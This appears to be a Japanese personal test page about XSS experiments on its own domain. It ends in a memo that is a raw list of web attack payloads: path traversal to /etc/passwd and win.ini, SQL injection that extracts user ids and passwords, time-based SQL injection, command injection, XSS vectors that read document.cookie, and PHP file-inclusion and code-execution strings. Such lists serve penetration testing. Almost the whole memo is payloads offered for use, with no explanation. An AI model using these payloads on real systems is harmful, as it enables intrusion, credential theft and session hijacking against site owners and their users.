bomibako XSSテスト---
Hello!
--- 自ドメイン内でYahooIframe表示テスト js生成DOMによる画像読み込みテスト twitterなどのシェア一覧調査が出来るらしいWEBのビーコンをおいてみた http://getshar.es/create よくわからなかったので放置しておく イメージ読み込み?じゃないjsアラート表示

ただのテスト なんでもない
押すとクッキー取得

ぼみばこ.com

Clip to Evernote bomibako bomibako
メモ '/../../../../../../../../../etc/hosts', '/../../../../../../etc/hosts', '/../../../etc/hosts', '/etc/hosts', '/../../../../../../../../../etc/hosts%00', '/../../../../../../etc/hosts%00', '/../../../etc/hosts%00', '/etc/hosts%00', '/../../../../../../../../../windows/win.ini', '/../../../../../../windows/win.ini', '/../../../windows/win.ini', '/windows/win.ini', '/../../../../../../../../../windows/win.ini%00', '/../../../../../../windows/win.ini%00', '/../../../windows/win.ini%00', '/../../../../../../../var/tmp/', '/../../../../../../../var/cache/mod_proxy/', '/../../../../../../../var/cache/', '/../../../../../../../var/www/', '/../../../../../../../etc/', '/../../../../../../../option/', '/../../../../../../../home/', '/../../../../../../../usr/', '/../../../windows/win.ini%00', '/../../../windows/win.ini%00', '/windows/win.ini%00', '?file=/etc/passwd', '?file=/Windows/win.ini', '?file=/MSOCache/', '?file=C:\Windows\System32\cmd.exe?', '/abc', '/*', '\'', '\"', '\,', "'", "' and 'a'='a'", "test and 1=1", "test ' or 'a'='a'", "%", "', \", <, and >", "'>\">
", "'>\">", "", "javascript:alert(document.cookie);", "/../../../../../../../sbin/ifconfig|", ";/sbin/ifconfig", "/../../../../../../../windows/system32/ipconfig|", "&/windows/system32/ipconfig", "'+AND+'1'%3D'1", "'waitfor%20delay'0%3a0%3a20'--", "'waitfor%20delay'0%3a0%3a00'--", "''\"\"¥", "'\"¥'\"¥", "'+AND+'1'%3D'2", "'+AND+'1'%3D'1", "'++'", "'++'’", ">alert("XSS")', '1%00">◆◆◆◆◆◆◆◆◆◆◆◆<', '', '', '20pt', 'XSS', '', 'XSS part2', '?file=http://bomibako.com/myphp.txt', '?file=php://echo"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"', "?heighlight=a','a',phpinfo());//", "filter_func=preg_replace&from=/^/e&to=phpinfo();", "?dir=| cat /etc/passwd", "?dir=--version", "xxx OR 1/*", '1+onmouseover%3dalert(document.cookie)', '"+onmouseover%3d"alert(document.cookie)', // nameは変更してもよい なるべくシステムに存在する変数に合わせる 'name=");alert(document.cookie)//', 'name=\');alert(document.cookie)//', "name='+and+cast((select+id||':'||pwd+from+users+offset+0+limit+1)+as+integr)>1--", "name='+union+select+id,pwd,name,addr,null,null,null+from+users--", "name=';copy+users(name)+from+'/etc/passwd'--", "author='+union+select+table_name,column_name,data_type,null,null,null+from+information_schema.columns+order+by+1--", "PHPSESSID=KBMJ"